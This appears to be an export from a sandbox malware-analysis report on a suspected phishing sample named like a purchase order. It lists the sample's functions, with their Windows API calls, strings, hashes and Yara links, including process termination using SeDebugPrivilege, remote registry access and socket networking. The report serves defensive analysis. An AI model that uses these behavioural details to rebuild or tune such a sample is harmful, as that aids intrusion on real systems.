ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0047DB6E
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0047DB95
DestroyIcon.USER32(00000000,?,?,?,?,?,?,0041A67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 0047DBA0
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0047DBBD
DestroyIcon.USER32(00000000,?,?,?,?,?,?,0041A67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 0047DBC8

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend
String ID:
API String ID: 1268354404-0
Opcode ID: 0cf6ee739ab52051da489bb8517c88828cd0cf7fce358cea2fa76b683adbfda0
Instruction ID: fadf16feb8645e96a8cf497107f48763286d092d757fb9cbab283d3aeb1fb45e
Opcode Fuzzy Hash: 0cf6ee739ab52051da489bb8517c88828cd0cf7fce358cea2fa76b683adbfda0
Instruction Fuzzy Hash: 65519B30A01208EFDB20CF64CC81FEA37B4AF08354F10452AF95A962D0D7B8ED90CB59

Function 00447555 Relevance: 13.6, APIs: 9, Instructions: 142filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00446EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00445FA6,?), ref: 00446ED8

Part of subcall function 00446EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00445FA6,?), ref: 00446EF1

Part of subcall function 004472CB: GetFileAttributesW.KERNEL32(?,00446019), ref: 004472CC

lstrcmpiW.KERNEL32(?,?), ref: 004475CA
_wcscmp.LIBCMT ref: 004475E2
MoveFileW.KERNEL32(?,?), ref: 004475FB

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
String ID:
API String ID: 793581249-0
Opcode ID: d4c9a3347340ec2f6b292e15ccfd5db41bd16ad9e0c1aa6c8d3ee4a06672525c
Instruction ID: 4fd7047bc00f5dce267b69f2963a5cde5898196708b614909851b39d2912f40e
Opcode Fuzzy Hash: d4c9a3347340ec2f6b292e15ccfd5db41bd16ad9e0c1aa6c8d3ee4a06672525c
Instruction Fuzzy Hash: 875153B2A092295BEF54EB55D8419DE73BCAF08314B4040EFF605E3141DB7897C5CB68

Function 0041EA69 Relevance: 13.6, APIs: 9, Instructions: 135COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,0047DAD1,00000004,00000000,00000000), ref: 0041EAEB
ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,0047DAD1,00000004,00000000,00000000), ref: 0041EB32
ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,0047DAD1,00000004,00000000,00000000), ref: 0047DC86
ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,0047DAD1,00000004,00000000,00000000), ref: 0047DCF2

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: e35abcf98b5afbda80e3227c5b88a53d0a40ca8882ce08670dafe92d1e5b9445
Instruction ID: a205110f149b1f1218910d7447822024f539e8ea0fa6c020a507fcb349153875
Opcode Fuzzy Hash: e35abcf98b5afbda80e3227c5b88a53d0a40ca8882ce08670dafe92d1e5b9445
Instruction Fuzzy Hash: 3041E738A1D2409ED735D72A898DAEB7BA5AF41304F19481FE84B426A1D67C78C1D31E

Function 0043B263 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0043AEF1,00000B00,?,?), ref: 0043B26C
HeapAlloc.KERNEL32(00000000,?,0043AEF1,00000B00,?,?), ref: 0043B273
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0043AEF1,00000B00,?,?), ref: 0043B288
GetCurrentProcess.KERNEL32(?,00000000,?,0043AEF1,00000B00,?,?), ref: 0043B290
DuplicateHandle.KERNEL32(00000000,?,0043AEF1,00000B00,?,?), ref: 0043B293
GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,0043AEF1,00000B00,?,?), ref: 0043B2A3
GetCurrentProcess.KERNEL32(0043AEF1,00000000,?,0043AEF1,00000B00,?,?), ref: 0043B2AB
DuplicateHandle.KERNEL32(00000000,?,0043AEF1,00000B00,?,?), ref: 0043B2AE
CreateThread.KERNEL32(00000000,00000000,0043B2D4,00000000,00000000,00000000), ref: 0043B2C8

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: b09332795f41ada4f02e568152242dc9f8119ecf0a51e018e84ae856f03226e9
Instruction ID: 649c36ebd82fd2d6613cd65ed5493ae8568e909360800d4a56ebfdffb0ad5fa3
Opcode Fuzzy Hash: b09332795f41ada4f02e568152242dc9f8119ecf0a51e018e84ae856f03226e9
Instruction Fuzzy Hash: 6101BBB5641304BFE710ABA5EC4DF6B7BACEB88711F018825FA05DB1E1CA749C00CB65

Function 0045C43F Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 401COMMON

Download Yara Rule

Strings

NULL Pointer assignment, xrefs: 0045C876, 0045C887
Not an Object type, xrefs: 0045C49E

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: e315d8b9a7ed296eecbc4226fe30bc1a590a1587bd0666714106e32b319d473d
Instruction ID: 8ae32c326f13b34f968a3fd0732ad79f87ca9b0915bfb685f72443b58ed8f10e
Opcode Fuzzy Hash: e315d8b9a7ed296eecbc4226fe30bc1a590a1587bd0666714106e32b319d473d
Instruction Fuzzy Hash: 4CE1B471A0031AAFDF14DFA4C8C1AAE77B5EB48355F14402EED05A7382D778AD49CB98

Function 004516DA Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 309COMMON

Download Yara Rule

APIs

Part of subcall function 0040936C: __swprintf.LIBCMT ref: 004093AB
Part of subcall function 0040936C: __itow.LIBCMT ref: 004093DF

Part of subcall function 0041C6F4: _wcscpy.LIBCMT ref: 0041C717

_wcstok.LIBCMT ref: 0045184E
_wcscpy.LIBCMT ref: 004518DD
_memset.LIBCMT ref: 00451910

Strings

p2Kl2K, xrefs: 00451920
X, xrefs: 00451948

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: _wcscpy$__itow__swprintf_memset_wcstok
String ID: X$p2Kl2K
API String ID: 774024439-158789027
Opcode ID: 12b759c7212d31acbcd3e923fc07cd2d485c9cd14401626b6f113df0707e9c81
Instruction ID: 5d701206c7572f194744bddddaa9641398cd276a84611de6d7f8691adec13a80
Opcode Fuzzy Hash: 12b759c7212d31acbcd3e923fc07cd2d485c9cd14401626b6f113df0707e9c81
Instruction Fuzzy Hash: BCC172715043409FC724EF65C981A5BB7E4BF85354F04496EF8899B2A2DB38ED09CB8A

Function 004086C2 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 155COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00407DBD

Strings

\, xrefs: 00407E1D
\, xrefs: 00407D89
Q\E, xrefs: 004086D6
], xrefs: 00407D9F
^, xrefs: 00407D96
[, xrefs: 00407E14

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: _memset
String ID: Q\E$[$\$\$]$^
API String ID: 2102423945-1026548749
Opcode ID: d41037d7f92c11d1953dae790eff98430697d4bed10d1df97d3838b3c32972b2
Instruction ID: 2ff868d98564f53564248656c62dcad6600245b14121f8b5c79a14c51b419cab
Opcode Fuzzy Hash: d41037d7f92c11d1953dae790eff98430697d4bed10d1df97d3838b3c32972b2
Instruction Fuzzy Hash: 2E517071D002099BCF24CF99C9817EEB7B1AF94314F24817BD858B7391D738AD858B99

Function 0046172F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135COMMON

Download Yara Rule

APIs

Part of subcall function 00446532: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00446554
Part of subcall function 00446532: Process32FirstW.KERNEL32(00000000,0000022C), ref: 00446564
Part of subcall function 00446532: CloseHandle.KERNEL32(00000000,?,00000000), ref: 004465F9

OpenProcess.KERNEL32(00000001,00000000,?), ref: 0046179A
GetLastError.KERNEL32 ref: 004617AD
OpenProcess.KERNEL32(00000001,00000000,?), ref: 004617D9
TerminateProcess.KERNEL32(00000000,00000000), ref: 00461855
GetLastError.KERNEL32(00000000), ref: 00461860
CloseHandle.KERNEL32(00000000), ref: 00461895

Strings

SeDebugPrivilege, xrefs: 004617B8

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: 270c03403a1bab446a1558f45870165f337d3cd8e2a64d14bab469aaa4e9bc0a
Instruction ID: d2d618a15ae8a2f00e8176200d48da833dd737e9018933eaf1cf8cd54ec3b0d0
Opcode Fuzzy Hash: 270c03403a1bab446a1558f45870165f337d3cd8e2a64d14bab469aaa4e9bc0a
Instruction Fuzzy Hash: 3C41E231600200AFDB05EF55C8D6FAE77A5AF54304F08846EF9069F3D2EB7C99008B9A

Function 00445819 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 004458B8

Strings

stop, xrefs: 00445889
warning, xrefs: 004458A1
info, xrefs: 00445859
question, xrefs: 00445871
blank, xrefs: 0044583A

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: 5bfb3e2f318e15bc9736881087da9f68b7bd6f9ed755ebbf19411a783dae3153
Instruction ID: c7aeb5d251757967eccb0ff0c75affac7e8e2f1af9d52ff6fef3c92f1c8c2872
Opcode Fuzzy Hash: 5bfb3e2f318e15bc9736881087da9f68b7bd6f9ed755ebbf19411a783dae3153
Instruction Fuzzy Hash: 7A11D831749756BBBF116A55AC92DAB33DC9F25314B20003BF500A6283EBACAA11426D

Function 0044A729 Relevance: 12.3, APIs: 8, Instructions: 317COMMON

Download Yara Rule

APIs

SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 0044A806

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: ArraySafeVartype
String ID:
API String ID: 1725837607-0
Opcode ID: 7a8f8a471411fe2fa06817c37687fc143dfbfe5ddb5f0facf6f6bd21be5f378c
Instruction ID: ed324042c9a2b2701b04785601773068e8da0337221a3b70339ad8aef4324f64
Opcode Fuzzy Hash: 7a8f8a471411fe2fa06817c37687fc143dfbfe5ddb5f0facf6f6bd21be5f378c
Instruction Fuzzy Hash: 63C19F75A4121ADFEB00DF94C481BAEB7F4FF08314F24446AE605E7381D738A956CB9A

Function 00446B49 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00446B63
LoadStringW.USER32(00000000), ref: 00446B6A
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00446B80
LoadStringW.USER32(00000000), ref: 00446B87
_wprintf.LIBCMT ref: 00446BAD
MessageBoxW.USER32(00000000,?,?,00011010), ref: 00446BCB

Strings

%s (%d) : ==> %s: %s %s, xrefs: 00446BA8

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wprintf
String ID: %s (%d) : ==> %s: %s %s
API String ID: 3648134473-3128320259
Opcode ID: 584890564f3e5e306f944e4d1379c1c94349139ecdd1e8586c36002fd5fee6da
Instruction ID: 869915b13ef1c9269c9a5a225239d8a80d17e3bad1684c58eb68944aaf863664
Opcode Fuzzy Hash: 584890564f3e5e306f944e4d1379c1c94349139ecdd1e8586c36002fd5fee6da
Instruction Fuzzy Hash: D6018BF2D002187FEB11A790DD89EFB376CD704304F0048A6B745D2041EA749E844F79

Function 00462B19 Relevance: 12.3, APIs: 8, Instructions: 251registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00463C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00462BB5,?,?), ref: 00463C1D

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00462BF6

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: BuffCharConnectRegistryUpper
String ID:
API String ID: 2595220575-0
Opcode ID: 6d31954bfeeb4fbec2f24b2ba4668f25a2aa16c926f529318bfd36a693b94962
Instruction ID: 1436c638f4f59939a06b47cea4d9ff7190834685fc5c7c5e6771a34debbfa418
Opcode Fuzzy Hash: 6d31954bfeeb4fbec2f24b2ba4668f25a2aa16c926f529318bfd36a693b94962
Instruction Fuzzy Hash: F8919E71604201AFC700EF55C991B6EB7E5FF88318F04882EF99697291EB78E945CF4A

Function 004595BF Relevance: 12.2, APIs: 8, Instructions: 247networkCOMMON

Download Yara Rule

APIs

select.WSOCK32 ref: 00459691
WSAGetLastError.WSOCK32(00000000), ref: 0045969E
__WSAFDIsSet.WSOCK32(00000000,?,00000000), ref: 004596C8
#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 004596E9
WSAGetLastError.WSOCK32(00000000), ref: 004596F8
htons.WSOCK32(?,?,?,00000000,?), ref: 004597AA
inet_ntoa.WSOCK32(?,?,?,?,?,?,?,?,?,?,?,?,0049DC00), ref: 00459765

Part of subcall function 0043D2FF: _strlen.LIBCMT ref: 0043D309

_strlen.LIBCMT ref: 00459800

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: ErrorLast_strlen$htonsinet_ntoaselect
String ID:
API String ID: 3480843537-0
Opcode ID: 904ac2158f58d9bd18f055b439e2098055e7f6b06fe52123bc4c9fc01e9cca11
Instruction ID: ecb2f0696e13bfc4d0e437cf891625e32063767c5bd0d3a1f1d580528dc96400
Opcode Fuzzy Hash: 904ac2158f58d9bd18f055b439e2098055e7f6b06fe52123bc4c9fc01e9cca11
Instruction Fuzzy Hash: C381D371504200EBC714EF65CC85E6BB7A8EF85718F104A2EF955972D2EB38DD08CB9A

Function 0042A979 Relevance: 12.1, APIs: 8, Instructions: 118COMMONLIBRARYCODE

Download Yara Rule

APIs

__mtinitlocknum.LIBCMT ref: 0042A991

Part of subcall function 00427D7C: __FF_MSGBANNER.LIBCMT ref: 00427D91
Part of subcall function 00427D7C: __NMSG_WRITE.LIBCMT ref: 00427D98
Part of subcall function 00427D7C: __malloc_crt.LIBCMT ref: 00427DB8

__lock.LIBCMT ref: 0042A9A4
__lock.LIBCMT ref: 0042A9F0
InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,004B6DE0,00000018,00435E7B,?,00000000,00000109), ref: 0042AA0C
EnterCriticalSection.KERNEL32(8000000C,004B6DE0,00000018,00435E7B,?,00000000,00000109), ref: 0042AA29
LeaveCriticalSection.KERNEL32(8000000C), ref: 0042AA39

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
String ID:
API String ID: 1422805418-0
Opcode ID: 273149951996a536410480ec6ac0cd69ebb8ff04d6d08eba4afe8032a158651a
Instruction ID: 095ad9ea3ee5b9dc8ee4f7743ff6f5f47cd94fe39c9175350a546944aea4445a
Opcode Fuzzy Hash: 273149951996a536410480ec6ac0cd69ebb8ff04d6d08eba4afe8032a158651a
Instruction Fuzzy Hash: 08412CB1B002219BEB10DF69EA4475DB7B06F01335F50422FE825AB2D1D7BC9861CB9E

Function 00468ECC Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00468EE4
GetDC.USER32(00000000), ref: 00468EEC
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00468EF7
ReleaseDC.USER32(00000000,00000000), ref: 00468F03
CreateFontW.GDI32(?,00000000,00000000,00000000,00000000,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 00468F3F
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00468F50
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0046BD19,?,?,000000FF,00000000,?,000000FF,?), ref: 00468F8A
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00468FAA

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
